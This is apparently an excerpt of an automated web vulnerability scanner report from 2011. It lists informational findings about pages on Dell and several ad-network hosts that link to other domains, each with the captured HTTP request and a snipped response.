P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Batter
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.4. http://accessories.us.dell.com/sna/category.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/category.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sna/category.aspx?c=us&category_id=4014&cs=04&l=en&navla=26973~0~251106&nf=26973~0~251106&s=bsd HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 129649
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:14 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:14 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Printe
...[SNIP]...
<noscript>
                   <img src="http://ad.doubleclick.net/activity;src=1305124;type=smbej903;cat=print870;ord=0123456789?" width="1" height="1" border="0" alt="">
                   </noscript>
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.5. http://accessories.us.dell.com/sna/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 88780
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Comput
...[SNIP]...
<noscript>
                   <img src="http://ad.doubleclick.net/activity;src=1305124;type=smbej903;cat=enaho928;ord=0123456789?" width="1" height="1" border="0" alt="">
                   </noscript>
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.6. http://accessories.us.dell.com/sna/memconfig.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/memconfig.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sna/memconfig.aspx?c=us&l=en&cs=04 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31314
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:59 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:59 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Comput
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.7. http://accessories.us.dell.com/sna/printersupplies.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/printersupplies.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34516
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:21 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Printe
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.8. http://accessories.us.dell.com/sna/sna.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/sna.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_colorlasers_single_function HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:23 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Shop a
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.9. http://ad.doubleclick.net/adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5371.149925.MARTINIMEDIANETWORK/B5703799.12;sz=160x600;click0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/wallstreetoasis.com/ROS/L23/1747216000/Right/Martini/hertz_goldplusrewar_080111_387/hertz_bt_160x600.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A//www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps/pubclick//Martini/hertz_goldplusrewar_080111_387/pos/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000?;ord=1747216000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 16:17:10 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 8146
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jul 19 11:02:06 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ww.wallstreetoasis.com/forums/houlihan-lokey-exit-opps/pubclick//Martini/hertz_goldplusrewar_080111_387/pos/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000%3Fhttp://www.hertzgoldplusrewards.com"><img src="http://s0.2mdn.net/1868452/1-Hertz_GoldPlusAd_Chrysler_160x600_StaticBackup.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.10. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/newscolumns_businessstory

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/newscolumns_businessstory;u=**336x280,300x250********;page=article;msrc=googlenews_wsj;;mc=google_fullfree;tile=4;sz=377x135;ord=9507950795079507; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 576
Date: Sun, 04 Sep 2011 16:17:28 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/d;243471978;0-0;10;1425096
...[SNIP]...
~okv=;u=**336x280,300x250********;page=article;msrc=googlenews_wsj;;mc=google_fullfree;tile=4;sz=377x135;;~aopt=2/0/ff/0;~sscs=%3fhttps://buy.wsj.com/shopandbuy/order/subscribe.jsp?trackCode=aaprhvcl"><img src="http://s0.2mdn.net/viewad/3198123/1-iPad_4weekFree_377x135.PNG" border=0 alt="Click Here"></a>
...[SNIP]...

17.11. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/newscolumns_businessstory

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/newscolumns_businessstory;u=**377x50********;msrc=googlenews_wsj;;mc=google_fullfree;tile=1;sz=377x50;ord=9507950795079507; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1352
Date: Sun, 04 Sep 2011 16:17:28 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg" width="377" height="50" border="0" usemap="#Mapfeb09_stackedheader" />
<map name="Mapfeb09_stackedheader" id="Map">
...[SNIP]...

17.12. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/snippet_free_pass

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/snippet_free_pass;u=**336x280,300x250********;page=article;msrc=googlenews_wsj;;mc=google_fullfree;tile=2;sz=571x47;ord=9507950795079507; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 578
Date: Sun, 04 Sep 2011 16:17:28 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/e;242159875;0-0;2;61805211
...[SNIP]...
;~okv=;u=**336x280,300x250********;page=article;msrc=googlenews_wsj;;mc=google_fullfree;tile=2;sz=571x47;;~aopt=2/0/ff/0;~sscs=%3fhttps://buy.wsj.com/shopandbuy/order/subscribe.jsp?trackCode=aaaibmyp"><img src="http://s0.2mdn.net/viewad/3198123/ControlSnippetFreePass_571x47.jpg" border=0 alt="Click Here"></a>
...[SNIP]...

17.13. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/snippet_free_pass

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/snippet_free_pass;u=**336x280,300x250********;page=article;msrc=googlenews_wsj;;mc=google_fullfree;tile=3;sz=571x208;ord=9507950795079507; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 583
Date: Sun, 04 Sep 2011 16:17:28 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/z;242159935;0-0;2;61805211
...[SNIP]...
~okv=;u=**336x280,300x250********;page=article;msrc=googlenews_wsj;;mc=google_fullfree;tile=3;sz=571x208;;~aopt=2/0/ff/0;~sscs=%3fhttps://buy.wsj.com/shopandbuy/order/subscribe.jsp?trackCode=aaaibmyq"><img src="http://s0.2mdn.net/viewad/3198123/1-ControlSnippetFreePass_571x208.gif" border=0 alt="Click Here"></a>
...[SNIP]...

17.14. http://ad.doubleclick.net/adj/lqm.w3schools.site/RON  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lqm.w3schools.site/RON

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/lqm.w3schools.site/RON;kw=HTML5%20CSS%20Web%20Javascript%20SQL%20Hosting%20ASP.NET%20XML;sz=468x60;tile=1;ord=1A5ABC28C8794214C6F50823E0DED52F? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 322
Date: Mon, 05 Sep 2011 02:34:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b79/0/0/%2a/h;245605273;0-0;0;65085238;1-468/60;43346931/43364718/1;;~sscs=%3fhttp://www.ironspeed.com/AspAllianceHome.aspx"><img src="http://s0.2mdn.net/viewad/3229814/IronSpeed_468x60.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.15. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?&pub=7393925&code=7399421&cch=7394053&l=728x90&tmz=-5&area=-1&res=1920&rnd=0.00945581216365099&url=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_anchors2&3c=http%3A%2F%2Fvapden1.lijit.com%2Fwww%2Fdelivery%2Fck.php%3Foaparams%3D2__zoneid%3D128348__loc%3Dhttp%253A%252F%252Fwww.w3schools.com%252Fjsref%252Ftryit.asp%253Ffilename%253Dtryjsref_doc_anchors2__referer%3Dhttp%253A%252F%252Fwww.w3schools.com%252Fjsref%252Ftryit.asp%253Ffilename%253Dtryjsref_doc_anchors2__cb%3Dee69051449__maxdest%3D&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_anchors2 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.6143305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480; rrs=1002; rds=15222

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Wed, 07 Sep 2011 02:30:57 GMT
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 02:30:57 GMT
Content-Length: 8525


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
{return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n\n\n     \n        \n                \n        <a target="turn_ad_landing_page" href="http://www.smokeybear.com"><img border="0" src="http://img.turn.com/img/server/ads/ps/728x90.jpg">
...[SNIP]...

17.16. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:54 GMT
Vary: Accept-Encoding
Content-Length: 2779
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><iframe src="http://view.atdmt.com/CNT/iview/334305255/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223054;dct=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
ZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3Dhttp://clk.atdmt.com/CNT/go/334305255/direct/01/1315189854" target="_blank"><img border="0" src="http://view.atdmt.com/CNT/view/334305255/direct/01/1315189854" /></a></noscript></iframe><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110904223054&cmxid=2101.020016144100975458xmc" style="display: none" height="1" width="1" border="0" /><script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=19240&campId=161441"></script>
...[SNIP]...

17.17. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmXFbWzRkTvLDM4b6jATmwYzDAp-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE_aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc19mb3JtYXR0ZXh0mAKQA8ACBMgClZHuC6gDAfUDAAAARA%26num%3D1%26sig%3DAOD64_2pvgsUrFnwQ-b8TFRVylH69pmqSw%26client%3Dca-pub-3440800076797949%26adurl%3D HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_formattext&dt=1315189888684&bpp=18&shv=r20110824&jsv=r20110719&correlator=1315189888728&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=1126246809&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=4040782425&fu=4&ifi=3&dtd=64
